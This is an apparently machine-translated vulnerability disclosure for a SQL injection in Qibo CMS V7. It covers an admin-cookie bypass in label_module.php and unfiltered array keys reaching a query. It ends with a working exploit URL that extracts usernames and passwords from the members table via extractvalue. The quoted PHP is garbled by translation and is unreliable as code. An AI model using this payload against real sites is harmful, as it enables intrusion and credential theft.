Qibo cmsV7 full-site system SQL Injection

Qibo cmsV7 full-site system SQL Injection

Should the logic be slightly incorrect?

Http://down.qibosoft.com/down.php? V = v7

Problems found during the download.
 

Function Add_S ($ array) {foreach ($ array as $ key => $ value) {if (! Is_array ($ value) {@ eregi ("['\" &] + ", $ key) & die ('error KEY! '); $ Value = str_replace ("& # x", "& # x", $ value ); // filter unsafe characters $ value = preg_replace ("/eval/I", "eva l", $ value); // filter insecure functions! Get_magic_quotes_gpc () & $ value = addslashes ($ value); $ array [$ key] = $ value ;} else {$ array [$ key] = Add_S ($ array [$ key]) ;}} return $ array ;}

@ Eregi ("['\" &] + ", $ key) & die ('error KEY! ');

The key in the array is not well filtered.

If an array such as [1'] [2] is submitted, 2 will not be matched and exited.



__________________________________________________________________



Inc/label_module.php


 

If ($ jobs = 'show') {if (! $ _ COOKIE [Admin] &! $ Web_admin) {showerr ("You are not authorized to view ");} // get the header and tail labels preg_replace ('/\ $ label \ [([\ 'a-zA-Z0-9 \ _] +) \]/eis ', "label_array_hf ('\ 1')", read_file (getTpl ("head", $ head_tpl ))); preg_replace ('/\ $ label \ [([\ 'a-zA-Z0-9 \ _] +) \]/eis', "label_array_hf ('\ 1 ')", read_file (getTpl ("foot", $ foot_tpl); // $ label_hf indicates the search array of the header and checks the number of is_array tags in the header ($ label_hf) | $ label_hf = array (); foreach ($ label_hf AS $ key => $ value) {$ rs = $ db-> get_one ("SELECT * FROM {$ pre} label WHERE tag = '$ key' AND chtype = '99 '");

 

If (! $ _ COOKIE [Admin] &! $ Web_admin) {showerr ("You are not authorized to view ");}

I guess the Administrator has the permission to view it?

However, here we do not need to log on, even Members do not need to log on.



Because it is used here &, as long as it is not satisfied, it will not quit.

$ Web_admin here is definitely out of control.

However, $ _ COOKIE [Admin] can be directly controlled.

Then we can set $ _ COOKIE [Admin] to 1 and will not quit.


 

We do not need to log on and directly modify the cookie.


 

Once the cookie is modified, it will not be exited.


 

foreach($label_hf AS $key=>$value){$rs=$db->get_one("SELECT * FROM {$pre}label WHERE tag='$key' AND chtype='99'");if($rs[tag])

Then, the keys in the array are directly brought into the query.

Because the keys in the array are not addslashes combined with the bypass above, the injection is caused.

Http://www.test.com/v7/index.php? Jobs = show & label_hf [1' and extractvalue (1, concat (0x5c, (select concat (username, password) from qb_members limit 1) % 23] [2] = asd
 

Data is injected successfully.

Solution:

Filter.